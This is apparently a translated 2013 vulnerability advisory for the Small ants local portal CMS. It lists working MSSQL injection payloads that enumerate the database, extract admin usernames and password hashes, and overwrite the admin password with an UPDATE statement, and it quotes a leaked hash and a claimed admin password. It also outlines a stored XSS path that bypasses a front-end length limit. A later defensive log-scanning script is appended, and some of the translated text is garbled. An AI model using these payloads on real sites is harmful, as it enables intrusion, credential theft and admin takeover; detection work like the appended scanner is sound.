Small ants local portal system SQL injection and XSS - vulnerability warning - the black bar safety net

ID MYHACK58:62201341551
Type myhack58
Reporter Anonymous
Modified 2013-12-24T00:00:00


  1. SQL injection: 'and%20db_name()%3E0--

demo_xiaomayi_co (the database name)

'and (select top 1 name from demo_xiaomayi_co.dbo.sysobjects where xtype=CHAR(85))>0--

'and (select top 1 username from Ant_admin)>0-- the account

'and (select top 1 password from Ant_admin)>0-- the password hash

Replace the password

paLhASC5WX1ZUvaBeDN+lQ==, for a good post, admin admin password is weiwei0307

This broken bird, found to be false, really need you to find your own way.

update Ant_admin set password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRjsrcwlerucqmucxewvlquydzk19fxsnr' where Username='username'--
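A defender-side check for the request shapes shown in this section, as an added example that is not part of the original advisory: it URL-decodes logged query strings (including double encoding) and flags those that combine several of the markers seen above. The log layout, the /news and /search paths and the id and q parameters are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Indicators modelled on the request shapes in this advisory (error-based MSSQL probing).
INDICATORS = {
    "db_name_probe": re.compile(r"\bdb_name\s*\(\s*\)", re.I),
    "catalog_read": re.compile(r"\bsys(objects|columns)\b", re.I),
    "subquery_compare": re.compile(r"\(\s*select\s+top\s+\d+\s.+?\)\s*[<>=]", re.I),
    "update_set": re.compile(r"\bupdate\s+\w+\s+set\s+\w+\s*=", re.I),
    "quote_then_logic": re.compile(r"'\s*(and|or)\b", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}

def normalise(query, rounds=2):
    """URL-decode up to `rounds` times (double encoding) and collapse whitespace."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).strip()

def score_request(query):
    """Return the sorted names of all indicators present in one query string."""
    text = normalise(query)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def flag_lines(log_lines, threshold=2):
    """Return [(line_no, hits)] for lines matching at least `threshold` indicators."""
    flagged = []
    for line_no, line in enumerate(log_lines, start=1):
        fields = line.split()
        if len(fields) < 5:
            continue  # not in the assumed "date time method url status" layout
        hits = score_request(fields[3].partition("?")[2])
        if len(hits) >= threshold:
            flagged.append((line_no, hits))
    return flagged

# Constructed sample log; the paths and parameter names are hypothetical.
SAMPLE_LOG = [
    "2013-12-24 10:00:01 GET /news?id=12 200",
    "2013-12-24 10:00:05 GET /news?id=12'and%20db_name()%3E0-- 500",
    "2013-12-24 10:00:09 GET /news?id=12'and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=CHAR(85))%3E0-- 500",
    "2013-12-24 10:00:12 GET /news?id=12%2527and%2520db_name()%253E0-- 500",
    "2013-12-24 10:00:20 GET /search?q=rock+and+roll-- 200",
]

if __name__ == "__main__":
    for line_no, hits in flag_lines(SAMPLE_LOG):
        print(line_no, ", ".join(hits))
```

Requiring two or more indicators keeps a lone marker, such as a search term that happens to end in `--`, from raising an alert.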

  2. XSS

The XSS can comfortably reach the back end (the admin panel).

The front-end XSS is in the feature for publishing yellow-pages phone book entries. First sign up for a membership; these portal sites of course have open registration. Once registered, go to the place where yellow-pages phone book entries are published.

The fields beside and after the phone number are not filtered, but the front end enforces a length limit, so capture the request, modify it, click OK, and then submit.